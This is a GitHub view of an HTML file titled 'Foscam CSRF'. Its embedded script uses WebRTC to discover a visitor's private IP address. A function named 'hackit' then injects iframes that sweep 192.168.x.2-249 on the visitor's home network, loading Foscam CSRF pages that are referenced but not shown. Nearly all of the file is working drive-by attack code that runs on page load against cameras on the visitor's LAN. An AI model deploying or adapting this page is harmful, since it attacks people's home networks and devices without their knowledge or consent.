-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathfoscam.html
78 lines (58 loc) · 2.2 KB
/
foscam.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<html>
<head>
<title>Foscam CSRF</title>
</head>
<body>
<script>
function findIP(onNewIP) { // onNewIp - your listener function for new IPs
var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome
var pc = new myPeerConnection({iceServers: []}),
noop = function() {},
localIPs = {},
ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
key;
function ipIterate(ip) {
if (!localIPs[ip]) onNewIP(ip);
localIPs[ip] = true;
}
pc.createDataChannel(""); //create a bogus data channel
pc.createOffer(function(sdp) {
sdp.sdp.split('\n').forEach(function(line) {
if (line.indexOf('candidate') < 0) return;
line.match(ipRegex).forEach(ipIterate);
});
pc.setLocalDescription(sdp, noop, noop);
}, noop); // create offer and set local description
pc.onicecandidate = function(ice) { //listen for candidate events
if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
};
};
function hackit(ip) {
octets=ip.split(".");
network=octets[0]+"."+octets[1]+"."+octets[2];
var i;
// we're looking for home networks, so we only search 192.168.0/24 thru 192.168.9/24
if ( octets[0].match(/192/) && octets[1].match(/168/) && octets[2].match(/^[0-9]$/) ) {
// for time reasons we only search a subset of targets
for (i=2; i < 250 ; i++) {
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "iframe-foscam2.html?network="+network+"&octet="+i.toString());
ifrm.id = "iframe"+i.toString() ;
ifrm.style.width = 640+"px";
ifrm.style.height = 48+"px";
document.body.appendChild(ifrm);
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "iframe-foscam.html?network="+network+"&octet="+i.toString());
ifrm.id = "iframe2"+i.toString() ;
ifrm.style.width = 640+"px";
ifrm.style.height = 48+"px";
document.body.appendChild(ifrm);
};
};
};
findIP( hackit );
</script>
This is meant to be doing something...
</body>
</html>